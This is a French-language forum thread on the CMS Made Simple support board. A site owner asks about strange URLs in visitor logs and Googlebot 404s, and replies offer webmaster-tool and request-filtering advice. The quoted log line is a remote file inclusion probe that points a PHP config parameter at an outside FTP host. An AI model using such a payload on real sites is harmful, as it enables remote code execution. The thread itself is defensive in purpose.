Urls bizarres vues dans statistiques visiteur

Support en français pour CMS Made Simple.

Moderator: jce76350

Post Reply
rtlinfo
Forum Members
Forum Members

Urls bizarres vues dans statistiques visiteur

Post by rtlinfo »

Bonjour

sur un site en ligne, évidemment géré par cmsms, j'ai installé le module statistiques visiteurs, bien utile pour savoir qui visite (manquerait selon moi à ce module, une vue synthèse indiquant le nombre de visiteurs, par jour, par mois)

dans les lignes affichées par ce module, qui indique les urls du site visité j'ai ceci :
index.php/phototheque/album-2/57/inc/functions.inc.php?config[ppa_root_path]=ftp://80.50.253.90/upload/071011004039p/old?

Quand j'entre l'url modifiée, cmsms m'indique fort heureusement "page introuvable".

Sauf erreur de ma part, il semblerait que le visiteur ait modifié l'url de l'album photo pour tenter d'afficher des photos autres que celles issues de l'album photo intégré à ce site.

J'aimerais bien disposer de l'avis de personnes quant à cette url modifiée et quelles démarches peut on réaliser ?

Egalement dans les stastiques visitieur, j'ai le robot de google qui tente de visiter des pags telles que
index.php/phototheque/modules/Album/templates/db/greybox/AJS.js
ce qui provoque une erreur 404

Y a t il moyen d'éviter que le robot déclenche cette erreur ?

Merci d'avance pour vos éclaircissements

Richard
Lionel

Re: Urls bizarres vues dans statistiques visiteur

Post by Lionel »

Egalement dans les stastiques visitieur, j'ai le robot de google qui tente de visiter des pags telles que
index.php/phototheque/modules/Album/templates/db/greybox/AJS.js
ce qui provoque une erreur 404

Y a t il moyen d'éviter que le robot déclenche cette erreur ?
Grâce au service de google (webmasters tools) tu peux (depuis peu) entre autres:

Sous Outils -> URL à supprimer -> Bloquer la page à l'aide d'une balise META "noindex"

https://www.google.com/webmasters/tools

Un début de solutions...
Pierre M.

Re: Urls bizarres vues dans statistiques visiteur

Post by Pierre M. »

Bonsoir,
rtlinfo wrote: les urls du site visité j'ai ceci :
index.php/phototheque/album-2/57/inc/functions.inc.php?config[ppa_root_path]=ftp://80.50.253.90/upload/071011004039p/old?
il est plus que vivement recommandé de filtrer les requêtes reçues du web avant de les donner à manger à son PHP.

Pierre M.
Post Reply

Return to “French - Français”